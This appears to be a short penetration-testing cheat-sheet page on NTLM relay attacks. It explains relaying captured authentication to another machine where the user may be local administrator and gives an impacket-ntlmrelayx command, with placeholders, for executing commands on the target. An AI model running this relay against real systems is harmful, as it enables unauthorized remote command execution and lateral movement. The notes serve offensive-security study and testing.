Relay Attack

If you are unable to crack the NTLM hash, we can try to relay the authentication to another system. In fact, a user on one machine might be local administrator on another. If he is, we can run commands (no UAC confirmation required).

impacket-ntlmrelayx

sudo impacket-ntlmrelayx --no-http-server -smb2support -t <TARGET_RETRANSMISSION> -c "<COMMAND_TO_EXECUTE_ON_TARGET>"

Last updated 3 months ago